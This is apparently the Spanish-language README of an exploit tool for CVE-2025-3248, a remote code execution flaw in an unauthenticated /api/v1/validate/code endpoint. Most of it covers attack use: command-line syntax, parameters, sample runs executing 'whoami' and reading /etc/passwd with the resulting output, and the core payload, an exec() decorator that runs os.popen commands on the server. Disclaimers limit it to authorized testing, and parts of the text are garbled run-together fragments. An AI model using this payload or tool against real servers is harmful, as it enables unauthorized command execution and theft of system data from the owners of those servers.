
Exploit para CVE-2025-3248: inyecta payloads de Python manipulados en un endpoint de código API no autenticado para ejecutar comandos arbitrarios en el servidor objetivo.
CVE-2025-3248 Documentación de la herramienta de explotación Introducción Esta herramienta se utiliza para explotar la vulnerabilidad CVE-2025-3248 (una vulnerabilidad de inyección de código basada en Python) mediante la construcción de un payload malicioso para lograr la ejecución remota de comandos (RCE) en el servidor objetivo. La vulnerabilidad existe en un endpoint API de una aplicación web, donde un atacante puede inyectar código Python arbitrario a través de un punto de ejecución de código no validado.
Aviso importante: Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas. Las pruebas de penetración no autorizadas pueden violar la ley. Asegúrese de tener autorización explícita para el sistema objetivo.
Características
✅ Inyecta código Python malicioso a través del endpoint /api/v1/validate/code
✅ Soporta la ejecución de comandos arbitrarios del sistema (por ejemplo, whoami, ls, etc.)
✅ Tiempo de espera personalizable (predeterminado 10 segundos)
✅ Soporta dos formatos de salida: texto/JSON
✅ Manejo detallado de errores y salida de registros
Uso Sintaxis básica
python cve-2025-3248.py -t <URL_objetivo> -c "<comando>" [opciones]
Parámetros
| Parámetro | Obligatorio | Descripción |
|---|
-t, --target | Sí | URL del objetivo (formato: http://ip:puerto) |
-c, --command | Sí | Comando del sistema a ejecutar (debe ir entre comillas) |
-o, --output | No | Formato de salida (text/json, predeterminado text) |
--timeout | No | Tiempo de espera de la solicitud (segundos, predeterminado 10) |
-v, --verbose | No | Muestra registros de ejecución detallados |
Ejemplos de uso
Ejemplo 1: Ejecutar el comando whoami (formato de salida predeterminado)
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"
Salida de ejemplo:
[+] Comando ejecutado exitosamente
--------------------------------------------------
www-data
--------------------------------------------------
Ejemplo 2: Formato de salida JSON + registro detallado
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v
Salida de ejemplo:
{
"status": 200,
"content": "root:x:0:0:root:/root:/bin/bash\n...",
"success": true
}
Breve análisis del principio de la vulnerabilidad
code en el endpoint /api/v1/validate/codeexec() para ejecutar el código Python proporcionadoimport os
@exec("raise Exception(os.popen('whoami').read())")
def f():
pass
os.popen() para ejecutar comandos del sistemaAdvertencia de seguridad ⚠️ Esta herramienta está destinada únicamente a pruebas de penetración autorizadas ⚠️
Recomendaciones:
-v para ver registros detallados y evitar operaciones incorrectasEntorno de dependencias
requests (debe instalarse previamente)pip install requests
Descripción del manejo de errores
| Código de error | Causa | Solución |
|---|---|---|
[-] Formato de URL objetivo incorrecto | La URL carece de esquema o host | Verifique el formato de la URL (por ejemplo, http://127.0.0.1:8080) |
[-] Tiempo de espera de la solicitud | El objetivo no respondió a tiempo | Aumente el valor del parámetro --timeout |
[-] Error de conexión | El objetivo no es alcanzable / bloqueado por cortafuegos | Verifique la conectividad de red |
[-] Fallo en la ejecución del comando. Código de estado HTTP: 403 | El servidor deniega el permiso | Confirme si el servicio objetivo permite la ejecución de código |
Detalles técnicos
/api/v1/validate/codeexec/eval)Descargo de responsabilidad: Este documento es únicamente para fines de investigación y educación en seguridad. El autor no se hace responsable de ninguna pérdida directa o indirecta causada por el uso de esta herramienta. Asegúrese de cumplir con las leyes y regulaciones y utilizar herramientas de seguridad de manera legal.